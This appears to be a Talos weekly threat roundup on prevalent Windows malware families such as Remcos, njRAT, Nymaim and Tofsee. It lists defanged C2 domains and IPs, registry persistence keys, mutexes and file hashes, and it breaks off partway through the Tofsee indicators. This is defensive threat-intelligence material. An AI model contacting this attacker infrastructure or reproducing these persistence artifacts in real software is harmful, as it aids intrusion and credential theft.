Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 30 and Aug. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date tof publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Malware.Autoit-9882353-0 Malware This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows attackers to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions or download follow-on payloads.
Win.Dropper.Remcos-9882391-1 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.njRAT-9882468-1 Packed njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Malware.Nymaim-9882470-0 Malware Nymaim is malware that can deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Malware.Tofsee-9882650-1 Malware Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the botnet's size.
Win.Packed.Dridex-9882835-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Dropper.TrickBot-9882885-0 Dropper TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Gh0stRAT-9882928-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Trojan.Zusy-9883232-0 Trojan Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Threat Breakdown

Win.Malware.Autoit-9882353-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
195[.]181[.]248[.]12 25
120[.]136[.]10[.]20 12
192[.]35[.]177[.]64 10
172[.]67[.]75[.]27 8
104[.]26[.]13[.]247 7
72[.]21[.]81[.]240 6
104[.]26[.]12[.]247 6
23[.]3[.]13[.]154 2
205[.]185[.]216[.]42 1
23[.]3[.]13[.]88 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
vinyamars[.]sk 25
arm[.]com[.]ng 13
www[.]arm[.]com[.]ng 13
www[.]colorsshoes[.]jp 12
apps[.]digsigtrust[.]com 10
apps[.]identrust[.]com 10
cs11[.]wpc[.]v0cdn[.]net 6
cds[.]d2s7q6s2[.]hwcdn[.]net 1
Files and or directories createdOccurrences
%TEMP%\home1.txt 25

File Hashes

0025aadfbab17e9687aa21d13da1b3972ff0b05569113bd0f373f4dd5c04bfbb
02ae2648ac9571b2b18844d2bf7fc2aeecb53263989de07c4e93dfdff5166062
08a681b6f8cc5011ca675abb9b5b99c48bbab97d075669ddf03a4a28f66504d9
08de65041c75a3e1b6951d883b8ee4feb137d888e3cc96819a9b724fc823a3ea
0d173043a7a895a4551a647342bdfc5d8704d1f0de0f1e58cd1325aeb513e8aa
12263633d16689d353523c83d4972641131a84a8f1094c16e70747828c5431e3
13ec4ce498080a5da47b8d855c4c1c865c4089beaef8b3a9b7769ef0fa6b79a3
14dab213bb0a092a4c222256e8487db3a2b83a486d8d61b57c14b914b2ac5841
21dca2f8354dec2b5a8ae5c32ec827f0be94eab422c46ca701661dbf22cbcbdd
243cb7fdb9df4a65e04de6712c95c04fe4208117d952e6c6cc02f89f637e118f
25bc944b81f1352034884cb55c1ccaf466d0d00760982e6ade22f05d57d3ab25
25c9ea663a127d974aeb2c88fc639621c447065491afaaf04142f20d28eba6c6
3147e4788081de73f80e166f3ab8f73874b8f964a23494fa9188d871d28f445d
33f644cc90d3d00bb814ac384cd514f4fa3ef929af50d313956b3249d4d4f007
3b83bd58b6ba911509543bde8c8d90cd8d38fca1e4560638f6366bc1de751e2a
3bead316c0445f9dd471f4f0f5c33882a27eda7fe66e8f396aead28b6a8b9c72
47d67692c31d652b234f68193abc32fb88616a8ef5ec74993f9ff97e5d909727
5a1dcaa1bb293aaee77bccb58092737cd315630f2f72518d90b41e1b78abebf7
5b463fc0169d6e820bd9c8693007db122e6dd8cbf30c3928961e77fc6d50cdf6
5eb862fe7432753e26a817d792bd69969ad66197c2a5ca88e407dd3306771256
66cf8494899f61d715b089f70beb49394e7c2806762aac8ff54444ad1375b578
6b75cbd329cf7660e88a463e5ae9c2e4fdf5c56a2753d3696bb93d8f67c18205
6dcd111c8a4d37f5e11544e05b11604bdd672fdc09bff5f8b0f4013f4bcd89c7
6ea8c3820def15e695358a42a26ce3bd1307cbb7ffbd5b14c63a55b801b016b1
6f0ace6dea53f7b4f0effa1b1dd43ec3c9838dbe6facd5b61043d4c19db6cd78

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Dropper.Remcos-9882391-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 138 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\REMCOS-0S5XD9 128
<HKCU>\SOFTWARE\REMCOS-0S5XD9
Value Name: licence 		128
<HKCU>\SOFTWARE\REMCOS-0S5XD9
Value Name: exepath 		128
MutexesOccurrences
Remcos_Mutex_Inj 128
Remcos-0S5XD9 128
BCevEgBhzLGKaNZWXfH 128
Global\d5a46aa1-eedf-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
173[.]194[.]68[.]156 1
140[.]82[.]112[.]4 1
20[.]36[.]253[.]92 1
52[.]85[.]144[.]86 1
65[.]55[.]44[.]109 1
199[.]232[.]38[.]217 1
52[.]85[.]144[.]68 1
172[.]217[.]222[.]138 1
185[.]199[.]109[.]133 1
54[.]81[.]163[.]76 1
44[.]230[.]27[.]49 1
23[.]38[.]131[.]139 1
44[.]238[.]161[.]76 1
52[.]114[.]158[.]50 1
5[.]61[.]37[.]41 1
95[.]216[.]195[.]92 1
23[.]78[.]173[.]83 1
193[.]56[.]146[.]41 1
193[.]56[.]146[.]42 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
thankyoulord[.]ddns[.]net 128
github[.]com 1
e11290[.]dspg[.]akamaiedge[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
go[.]microsoft[.]com 1
docs[.]microsoft[.]com 1
wcpstatic[.]microsoft[.]com 1
www-google-analytics[.]l[.]google[.]com 1
www[.]google-analytics[.]com 1
w[.]usabilla[.]com 1
web[.]vortex[.]data[.]trafficmanager[.]net 1
a3[.]shared[.]global[.]fastly[.]net 1
cdn[.]speedcurve[.]com 1
web[.]vortex[.]data[.]microsoft[.]com 1
stats[.]l[.]doubleclick[.]net 1
c-msn-com-nsatc[.]trafficmanager[.]net 1
stats[.]g[.]doubleclick[.]net 1
c[.]bing[.]com 1
c1[.]microsoft[.]com 1
avatars[.]githubusercontent[.]com 1
js[.]monitor[.]azure[.]com 1
browser[.]events[.]data[.]microsoft[.]com 1
skypedataprdcolwus02[.]cloudapp[.]net 1
Files and or directories createdOccurrences
\TEMP\test.exe 129
%System32%\Tasks\Updates 128
%System32%\Tasks\Updates\vXAlJeWc 128
%APPDATA%\vXAlJeWc.exe 128
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 128
\test.exe 56
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\test.exe.log 55
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-child.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\scriptCache.bin (copy) 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\startupCache.4.little 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache-new.bin 1
%LOCALAPPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\startupCache\urlCache.bin (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\addonStartup.json.lz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\broadcast-listeners.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4 (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\crashes\store.json.mozlz4.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\aborted-session-ping.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\session-state.json (copy) 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\datareporting\session-state.json.tmp 1
%APPDATA%\Mozilla\Firefox\Profiles\ogpxv0ba.default\extensions.json (copy) 1

*See JSON for more IOCs

File Hashes

02321739421cbb09b54d680e335185f7de92b600091b98329513d93105b52cf9
056f7e71e78e17cb0aa79b64da08286b964f2178d2090d64911c6642c36814c2
05d17139b921ae02f19e54781b300706557784df832ddbc079b3fe7536a31e53
0629ae9ce719b554c6424aa99ddb7846c84c5d974ab154b86b93a02fae8b9e7f
0d7a9543ec582ffc43374849315420543f2cc965dd4bb2e5e35ab4184d2e2ca1
0e51d9a05ced1a052a3d1e040c77d7e2159f5337739d69521d14dacbb599a0bd
11fa1333306fce3fa0d07f67f7889a07c9ff46c2bea22d5fe6ccfb1a1e09fad7
14a3210351da92f62bcb1fdf17488d3c43256e32707927c93a6491919e30db94
166532feecaa14575279d728da2c9988049a8a7ea5d479e04c588a554a097809
1ae5c64428959fef8b3478d1122637582a8194c5e34f8c3d038bf1373e003151
1e7978e1cb0ba4b5299d27d02c24d1ffa5db3b71eb908b8140f06eb081d658dd
218157900d57ddfce9598f8d49b0a8ccae080585cf19e01566ed73e2396131b1
22097730f40c3674a5b6050cfe2cf4ffed317d655e1c5c0d2a421fde7b07cfc4
2215b8b4b20a409c462e851f8597a12979781c8944204f26110e966860556b36
2247a83cbf55716bdd74aa1e05de9e4f89c802b8eb86590da762dd2f789b6831
254c9b7ed45741e81a5dbeb2a2214c57fbe43c10fab1da1a74f8549c64280ae5
2733f90b77a0b67f033a5188ca6d1a46e754dff03b5656dafb034d523e121c92
282b00987afb9dc3b65e035b1bd657ecc5ac7e52e9aee19c70f2f9265646fae7
2ada77612f68d343b4bcf228680b62ec266d00475446059729ce9ab7c68a154b
2c2b86f171fc93e574ba1a061ac87a0a3fca981f469104fa3cfbad54f313faa7
2c4bbc96d9a6d42c0b43e55735bfb7f90f891d97eee01b0c3520fdaf8f32c2fa
313ea6fc3c74e6c22980ddeaf1cea19f7ee7edeae2c71c4c1256ecf015d7189a
31e51fcfaaac27c60699174b6ab7e62beb11c6bc956c77a5cf85122a58c11487
3382824ce7a07e71dceae6980e76a716b1b8a00f746022d18545e50cae6b0984
33fc3a1693034d07cf75662a8e2245a895448d1db5249626129c660774263f14

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Packed.njRAT-9882468-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKU>\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: di 		17
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS 		16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec 		16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 5cd8f17f4086744065eb0992a09e05a2 		2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 5cd8f17f4086744065eb0992a09e05a2 		2
<HKCU>\SOFTWARE\7CC1F7C2D4BAE6BC7887F26D77AA018C 2
<HKCU>\SOFTWARE\7CC1F7C2D4BAE6BC7887F26D77AA018C
Value Name: [kl] 		2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 212683d986fb740ad6a40184df48e604 		1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 212683d986fb740ad6a40184df48e604 		1
<HKCU>\SOFTWARE\212683D986FB740AD6A40184DF48E604
Value Name: [kl] 		1
<HKCU>\SOFTWARE\212683D986FB740AD6A40184DF48E604 1
<HKCU>\SOFTWARE\7C8F800C2AE443A9C83B151599F29C82 1
<HKCU>\SOFTWARE\7C8F800C2AE443A9C83B151599F29C82
Value Name: [kl] 		1
<HKCU>\SOFTWARE\E1785F1E26AD1CA79573011E0FF02E70 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e1785f1e26ad1ca79573011e0ff02e70 		1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e1785f1e26ad1ca79573011e0ff02e70 		1
<HKCU>\SOFTWARE\E1785F1E26AD1CA79573011E0FF02E70
Value Name: [kl] 		1
<HKCU>\SOFTWARE\AB1AAA0BFE3591BECA82BFE474A8F47B 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ab1aaa0bfe3591beca82bfe474a8f47b 		1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ab1aaa0bfe3591beca82bfe474a8f47b 		1
<HKCU>\SOFTWARE\AB1AAA0BFE3591BECA82BFE474A8F47B
Value Name: [kl] 		1
<HKCU>\SOFTWARE\0886B3912F2BB02C6693C574C429F051 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 0886b3912f2bb02c6693c574c429f051 		1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 0886b3912f2bb02c6693c574c429f051 		1
<HKCU>\SOFTWARE\0886B3912F2BB02C6693C574C429F051
Value Name: [kl] 		1
MutexesOccurrences
<32 random hex characters> 17
5cd8f17f4086744065eb0992a09e05a2 3
Global\0c5a41e1-f0e9-11eb-b5f8-00501e3ae7b6 1
Global\0ccf23c1-f0e9-11eb-b5f8-00501e3ae7b6 1
Global\0cf9fc81-f0e9-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
94[.]73[.]33[.]36 1
94[.]73[.]41[.]240 1
78[.]159[.]131[.]121 1
41[.]200[.]143[.]212 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
kinghonza[.]no-ip[.]biz 2
ramisy[.]ddns[.]net 2
zzzzaaaa[.]ddns[.]net 1
mhmd[.]ddns[.]net 1
hacker7[.]ddns[.]net 1
computer[.]no-ip[.]biz 1
maazxmbm[.]ddns[.]net 1
lkshkht1[.]myftp[.]biz 1
wassim1202[.]ddns[.]net 1
pouti1[.]no-ip[.]biz 1
ramisy[.]myq-see[.]com 1
abdullahss[.]no-ip[.]biz 1
noor85[.]no-ip[.]biz 1
kishk00[.]ddns[.]net 1
Files and or directories createdOccurrences
%TEMP%\e653d73e45833b6c 25
%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe name>.log 21
%TEMP%\server.exe 9
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 8
\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2 3
%TEMP%\Trojan.exe.tmp 3
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5cd8f17f4086744065eb0992a09e05a2.exe 2
\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 1
%APPDATA%\server.exe 1
%TEMP%\system32.exe 1
%TEMP%\server1.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\0886b3912f2bb02c6693c574c429f051.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\4fc66b344f8529857a68b59448691734.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\9fcc88f1f248b4dbfd803b65f449acf3.exe 1
%ProgramData%\zzzz.exe 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\500965600.exe.log 1
%LOCALAPPDATA%\Microsoft\CLR_v2.0_32\UsageLogs\Windows.exe.log 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\5b2cd92f335e3944d2dfa471de408b34.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d1e729a473975eff06a55a309c2013cd.exe 1

File Hashes

105c3207f7516582d02c26428e32e64181c3d258dbb2358ab17b69e7b2e89b2d
12abcf56af00731447ed0cffbb7951e66d562cf39cd135b243dbfe595e37fc91
1af8edb622dbf1c1e60b1811ec4f8447c512a1aecd5cc00b3d6615eba4ca9588
1bc839f6a608310224dd06d66900a6314ffe6f6fc8cd4bfd0a0b3cda6e589ce9
24b5fbba292e1209a1b00497f14d6bc21e4b25a1adad781788505fe9be6f5178
29751d69e6beb986895de10afbefd17885e9f5fa4aa0f281f5a03948f8c76cc7
2b2ecd7bf3a04c8ce24a51c001b28006f00259665644ce828992c24def0559de
4266fcb85ba8c4bd6c13dcdf2833e9477b10fdcf554448f0a5c2992a2686c172
43f46de7cb7594b013a83601648544a3047b5d77e09e05f34b286f8c6960ba52
4dc216750b20e0594c18cdb52f5578413d918c8f4e032541badcbdbc28a9d555
53e739f663ee64dbff220383811d3255300b7a8c459d3acd47d1e539fec04f45
576cb07ae49d569971075bfcb4781e499c5c09cf5c5fa84d72dae2ebf050b819
613050981c98182bae457f83bc0513ecbc1f92da6ed3eaf84449969cfebee58e
6a4c7065537bcf08a36a6b88fd2ae85937061d9d963e8af70af1341d45a5c052
6d59405409e92fc6bc71bce7027f69148666e0e730ea16e60d5327a91b09f73f
6f3d01c3edc8681f835c00baca862d5b37b2c8e9949c3a1e0691b256a5b1e1d1
71b2ebba1f2cf21e2514e99449d0e41ac32d72baba7b71d49b014b275158da1b
7a925a4f0f083b9b4969c0974ec64bffb7049b46854fd578e488af32eab4518b
94a8250c4b36e57767ac6a204e6e8c7a322941576e7530e9b88dcf3c3e4529ae
9616f7c07cd16bb46cadadedc01328d69ec7f42feab2d994d137d93c555b5635
978fbdc3fb2ba585d221a57d1d48bd829e7a1a6cc6f012ebfbe87e5245c8cf96
985926c2a2d61cf9d28f0fae4f8c4ca68a5761fded38343e4e3fd093d47e3507
a510164d2a47b9f5c4ea2f86f210f523df91b956ccd54e7ee44f38b5a542adf6
b9e792fbb80a256fbcf6fa9a3361b17c81c40fdfd56f8b046f50ecb4d49bc9be
caf13a878409702e6eec3958e40f0f9ec85ee173fa326f6fcd0f32e45f59af77

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Malware.Nymaim-9882470-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 22
<HKCU>\SOFTWARE\MICROSOFT\KPQL 22
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg 		22
<HKCU>\SOFTWARE\MICROSOFT\KPQL
Value Name: efp 		22
MutexesOccurrences
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 22
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 22
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 22
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 22
Local\{B13D69F8-F0AA-A818-5093-74D6601607EE} 22
Local\{364979D3-CCFF-AEC0-03C9-4C6906B10346} 22
Local\{E55AD28E-29DB-FB2A-7AB3-28939E6ED727} 22
Local\{1597A4DE-9B90-FFD9-AEFD-35162EE2C568} 22
Local\{1E3C2A10-A2FE-DF24-DAA2-BB385E44D2D0} 22
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
52[.]85[.]144[.]32 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
luuypgmmlndq[.]in 22
ruqcdr[.]in 22
modsbicfioxd[.]pw 22
cwfjj[.]pw 22
atmnjoted[.]com 22
uudoonnyycw[.]net 22
zfougwzcl[.]net 22
ptudgjdocbd[.]pw 22
rsuamdj[.]in 22
eafjh[.]pw 22
vmpqvbrhlri[.]in 22
fincbuu[.]net 22
ryheqdimmr[.]in 22
mvtforxht[.]com 22
ggtwx[.]com 22
vrboynwrdl[.]net 22
rarcraaisq[.]pw 22
rbtnpeutu[.]in 22
otjyzplh[.]net 22
iukobk[.]net 22
ehtsftixqw[.]pw 22
twkzd[.]net 22
pylxcogkv[.]net 22
zzosavwbgu[.]in 22
ymqkldw[.]net 22

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramData%\ph 22
%ProgramData%\ph\eqdw.dbc 22
%ProgramData%\ph\fktiipx.ftf 22
%TEMP%\gocf.ksv 22
%TEMP%\kpqlnn.iuy 22
%ProgramData%\jzk\icolry.ylg 22
%TEMP%\qnvgtx.eww 22
%ProgramData%\jzk\betrwq.wot 22
%TEMP%\xyubi.zds 22

File Hashes

04426c542165b0e1c07f2e8e801ca192c3ef1a9c475a7f485d08a4033af74443
0ebfd8829fa188bd0a53a65ba221488bcf5f1f6db8b57ff266d53bfe8da265ff
17fca7a9ec40e60e5fb2441e042922cc59e5b8e6f73f546d47f737370abb4eef
185c3c7ba7da54fa83f5a035fdd44f0d4dce0e91188397517f34396f1cde6d73
1872256a0cb790891c1f96daa46b8f1f219b6063320d43ea584ffe59f1e32110
2e0fb025627eca4ed6cc6377c4b8e0580942240d64a7f52d9a6f62841309cbb3
3cafad60eee5f93e3024e3abec3f133d75853620f19e8f14f9a956ba60b185f5
40817b2e65047486a312050597b3ee05a793ca6a6e24d385f1aaa241eadd6f52
40df42d98a57b4b7c43a3970e9ad231aa93be4b2c781c779931b2c61b180f541
4c9c0f80f3360d1fb7d9e681cccd29fe8ce3935852cb7a2360c2c92d5f526aa9
5256b8458d8e291bf7858456d649b9bfe1675b0b510d135beec3e99f2136ec60
659aacb6a44be99f42a9d52d636bfec5546a5f77108345169abb23b8dec3a9cf
a4836eff3b1d1db27cd528f41a7d2f162d0303136b1b29ef0655514f9264666a
a725814dfadf22b1d0664accf93ab194d9a9094842e916f456d5283a32aba74b
b32d6c9f170e2754d10e9465280b8a4680c35d822ac922c7cdf2b68ae1bcbb2a
bb94fe556c5824fbf7a64ebb396e13cbd88fc94bc19c9467d18204e57cff446b
bd69acc18442d95eb3d8b71b2ebb56183b9083be1f40ad7edc7b7fb457f925a3
cba28cc59d4decafbfa163d72e60130924075b14df1ca69bb42e0d08e02eca3a
cbd9fab20a3d689ee86169e0e1be21a30f8712834f08a12dae3629c793345771
d2cde7c24cc0c67578363a1f5ea93f7fda830db8b0b67e53892f087b2dbcb230
f669bcb9ad35d41e048b4b6ee4ac4e5a6256fdab0e92a045e124825be792d151
fd94efbc06c729bb9e05005b8d799550524225a05bc71f6059df7d480d68c46e

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK

Win.Malware.Tofsee-9882650-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 300 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 299
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4 		212
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description 		62
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath 		26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Type 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Start 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ErrorControl 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: DisplayName 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: WOW64 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ObjectName 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Description 		19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU 19
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg 		18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Type 		18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Start 		18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ErrorControl 		18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: DisplayName 		18
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 300
192[.]162[.]246[.]7 209
5[.]61[.]37[.]41 209
95[.]216[.]195[.]92 209
142[.]250[.]72[.]100 181
104[.]47[.]54[.]36 153
104[.]47[.]53[.]36 146
104[.]44[.]194[.]232/30 127
193[.]56[.]146[.]40/30 90
209[.]85[.]202[.]26/31 88
65[.]9[.]117[.]69 85
31[.]13[.]65[.]174 80
173[.]194[.]68[.]26/31 80
64[.]233[.]186[.]26/31 80
208[.]71[.]35[.]137 79
67[.]195[.]204[.]72/31 79
192[.]0[.]47[.]59 77
104[.]44[.]194[.]236/31 77
98[.]136[.]96[.]76/31 76
208[.]76[.]50[.]50 74
